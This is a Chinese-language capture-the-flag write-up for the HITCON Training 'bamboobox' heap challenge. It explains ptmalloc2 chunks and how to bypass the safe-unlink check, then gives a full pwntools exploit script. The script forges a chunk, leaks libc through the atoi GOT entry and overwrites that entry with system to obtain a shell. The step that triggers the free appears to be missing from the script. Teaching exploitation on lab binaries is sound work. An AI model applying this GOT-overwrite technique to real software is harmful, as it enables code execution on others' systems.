Write Up | HITCON Training Lab - bamboobox

这是我当软件安全课程助教时,在堆溢出内容后布置的一道题目,二进制文件在此。题目考察的是堆溢出safe Unlinking的问题。

堆的基本结构 (Ptmalloc2)


  • mchunk_prev_size: 如果当前堆块物理相邻的前一个堆块为空闲的话,此字段存储了前一个堆块的size;否则,该字段作为前一堆块的一部分用于存储数据。
  • mchunk_size: 记录当前堆块的size,大小必须为2*SIZE_SZ的整数倍(SIZE_SZ: 32位下4个字节、64位下8个字节)。由于size的大小特点,mchunk_size表示当前堆块大小时的低三位总是为0,因此将这三位利用起来作为标志位;其中,最低位是PREV_INUSE,表示物理空间上前一个堆块是否被分配使用。
  • fd: forward的简写,当前堆块处于空闲时,fd指向下一个空闲的堆块。
  • bk: backward的简写,当前堆块处于空闲时,bk指向上一个空闲的堆块。
  • fd_nextsize: 在空闲的large chunk中使用,指向下一个更大的空闲堆块。
  • bk_nextsize: 在空闲的large chunk中使用,指向上一个更小的空闲堆块。
struct malloc_chunk {
    /* Size of previous chunk (if free).  */
    INTERNAL_SIZE_T mchunk_prev_size;
    /* Size in bytes, including overhead. */
    INTERNAL_SIZE_T mchunk_size;
    /* double links -- used only if free. */
    struct malloc_chunk* fd;
    struct malloc_chunk* bk;

    /* double links -- used only if free. */
    struct malloc_chunk* fd_nextsize;
    struct malloc_chunk* bk_nextsize;

Safe Unlinking问题

当两块物理相邻的堆块空闲时,会发生合并(Fast Bin不会),堆块的合并操作如下:

#define unlink(P, BK, FD) { \
  FD = P->fd;  \
  BK = P->bk;  \
  FD->bk = BK; \
  BK->fd = FD; \


FD = P->fd // FD = address of free@got - 0x18
BK = P->bk // BK = address of shellcode
FD->bk = BK // (address of free@got - 0x18 + 0x18) = address of shellcode
BK->fd = FD // (address of shellcode) + 0x10 = address of free@got - 0x18


if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                    
    malloc_printerr (check_action, "corrupted double-linked list", P, AV);

因此,我们对fd与bk的赋值不能随便选择,而应满足上述检查。假设我们找到了内存中的一个指针ptr指向堆块P,我们设置fd的值为(&ptr - 0x18),设置bk的值为(&ptr - 0x10),那么:

FD = P->fd = &ptr - 0x18 // FD设置为ptr地址低0x18字节的地址(不是指向)
BK = P->bk = &ptr - 0x10 // BK设置为ptr地址低0x10字节的地址
// 故FD->bk与BK->fd均取到ptr的地址,如下:
FD->bk = (&ptr - 0x18) + 0x18 = &ptr 
BK->fd = (&ptr - 0x10) + 0x10 = &ptr
// 至此,满足 FD->bk、BK->fd、ptr均指向堆块P 


FD->bk = BK // ptr指向ptr低0x10字节的地址
BK->fd = FD // ptr指向ptr低0x18字节的地址




(base) ctfer@0ff627340865:~/ctf$ checksec bamboobox
[*] '/home/ctfer/ctf/bamboobox'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

二进制栈不可执行(NX enabled)、开启栈保护(Canary found),GOT是可更改的(Partial RELRO)。


undefined8 change_item(void) {
    printf("Please enter the index of item:");
    iVar1 = atoi(local_28);
    if (*(long *)(itemlist + (long)iVar1 * 0x10 + 8) == 0) {
        puts("invaild index");
    } else {
        printf("Please enter the length of item name:");
        iVar2 = atoi(local_18);
        printf("Please enter the new name of the item:");
        sVar3 = read(0,*(void **)(itemlist + (long)iVar1 * 0x10 + 8),(long)iVar2);
        *(undefined *)((long)(int)sVar3 + *(long *)(itemlist + (long)iVar1 * 0x10 + 8)) = 0;

并且由如下add_item函数中的操作可知,itemlist(地址为0x6020c0)存放用户输入的item[0]的length,itemlist+0x8存放item[0]的buffer。在上面绕过Safe Unlinking的分析中,我们需要找到一个内存中的指针使其指向堆块起始位置(即上述的P),这里,我们可以选择itemlist+0x8指针,因为我们可以通过修改item[0]的buffer来更改它指向的内容,方便下一步伪造堆块。

undefined8 add_item(void) {
    if (num < 100) {
        printf("Please enter the length of item name:");
        iVar1 = atoi(local_18);
        if (iVar1 == 0) {
        puts("invaild length");
    else {
        for (local_24 = 0; local_24 < 100; local_24 = local_24 + 1) {
            if (*(long *)(itemlist + (long)local_24 * 0x10 + 8) == 0) {
                *(int *)(itemlist + (long)local_24 * 0x10) = iVar1;
                pvVar2 = malloc((long)iVar1);
                *(void **)(itemlist + (long)local_24 * 0x10 + 8) = pvVar2;
                printf("Please enter the name of item:");
                sVar3 = read(0,*(void **)(itemlist + (long)local_24 * 0x10 + 8),(long)iVar1);
                *(undefined *)((long)(int)sVar3 + *(long *)(itemlist + (long)local_24 * 0x10 + 8)) = 0;
                num = num + 1;





from pwn import *

context.log_level = 'debug'
context(arch='amd64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']

r = process('./bamboobox')
# gdb.attach(r)
elf = ELF('./bamboobox')
libc = elf.libc

def show():
    r.sendlineafter("Your choice:", "1")

def malloc_chunk(length, value):
    r.sendlineafter("Your choice:", "2")
    r.sendlineafter("Please enter the length of item name:", str(length))
    r.sendlineafter("Please enter the name of item:", value)

def edit(index, length, value):
    r.sendlineafter("Your choice:", "3")
    r.sendlineafter("Please enter the index of item:", str(index))
    r.sendlineafter("Please enter the length of item name:", str(length))
    r.sendlineafter("Please enter the new name of the item:", value)

def free_chunk(index):
    r.sendlineafter("Your choice:", "4")
    r.sendlineafter("Please enter the index of item:", str(index))

malloc_chunk(0x80, "")
malloc_chunk(0x80, "")
malloc_chunk(0x80, "")

raw_input("after malloc three 0x80...")

ptr = 0x6020c8

# construct fake chunk
fake_chunk = p64(0) # prev_size of fake chunk
fake_chunk += p64(0x81) # size of fake chunk
fake_chunk += p64(ptr-0x18) # fd of fake chunk
fake_chunk += p64(ptr-0x10) # bk of fake chunk
fake_chunk += b'0'*0x60 # padding
fake_chunk += p64(0x80) # prev_size of item[1]
fake_chunk += p64(0x90) # size of item[1]
edit(0, len(fake_chunk), fake_chunk) # leverage the heap overflow

# free item[1] to trigger unlink

# expose the address of atoi
atoi_got = elf.got["atoi"]
payload = p64(0) * 3
payload += p64(atoi_got)
edit(0, len(payload), payload)

# use show_item to expose 
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil("\x7f")[-8:].ljust(8, b'\x00'))

# calculate the address of system
libcbase = atoi_addr - libc.symbols['atoi']
system_addr = libcbase + libc.symbols['system']

# fill in the address of the system function
edit(0, 0x8, p64(system_addr))

# atoi("your choice"), which actually is system("/bin/sh")